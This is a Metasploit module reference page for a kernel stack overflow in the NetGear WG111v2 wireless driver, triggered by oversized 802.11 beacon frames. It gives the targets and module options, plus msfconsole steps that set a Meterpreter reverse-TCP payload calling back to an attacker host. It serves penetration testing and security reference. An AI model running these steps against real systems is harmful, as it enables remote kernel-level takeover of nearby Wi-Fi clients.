NetGear WG111v2 Wireless Driver Long Beacon Overflow | Metasploit Exploit Database (DB)

NetGear WG111v2 Wireless Driver Long Beacon Overflow

This module exploits a stack buffer overflow in the NetGear WG111v2 wireless device driver. This stack buffer overflow allows remote code execution in kernel mode. The stack buffer overflow is triggered when a 802.11 Beacon frame is received that contains more than 1100 bytes worth of information elements. This exploit was tested with version 5.1213.6.316 of the WG111v2.SYS driver and a NetGear WG111v2 USB adapter. Since this vulnerability is exploited via beacon frames, all cards within range of the attack will be affected. The tested adapter used a MAC address in the range of 00:18:4d:02:XX:XX. Vulnerable clients will need to have their card in a non-associated state for this exploit to work. The easiest way to reproduce this bug is by starting the exploit and then unplugging and reinserting the USB card. The exploit can take up to a minute to execute the payload, depending on system activity. NetGear was NOT contacted about this flaw. A search of the SecurityFocus database indicates that NetGear has not provided an official patch or solution for any of the thirty flaws listed at the time of writing. This list includes BIDs: 1010, 3876, 4024, 4111, 5036, 5667, 5830, 5943, 5940, 6807, 7267, 7270, 7371, 7367, 9194, 10404, 10459, 10585, 10935, 11580, 11634, 12447, 15816, 16837, 16835, 19468, and 19973. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.

Search Other Modules


Exploit Rank

  • Low

Exploit Authors

  • hdm < hdm [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - Windows XP SP2 (5.1.2600.2122), WG111v2.SYS 5.1213.6.316 (default)
  • 1 - Windows XP SP2 (5.1.2600.2180), WG111v2.SYS 5.1213.6.316

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/driver/netgear_wg111_beacon
msf exploit(netgear_wg111_beacon) > show payloads
msf exploit(netgear_wg111_beacon) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(netgear_wg111_beacon) > set LHOST [MY IP ADDRESS]
msf exploit(netgear_wg111_beacon) > exploit


Exploit Module Options

ADDR_DST The MAC address to send this to (default: FF:FF:FF:FF:FF:FF)
CHANNEL The initial channel (default: 11)
DRIVER The name of the wireless driver for lorcon (default: autodetect)
INTERFACE The name of the wireless interface (default: wlan0)
RUNTIME The number of seconds to run the attack (default: 60)
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session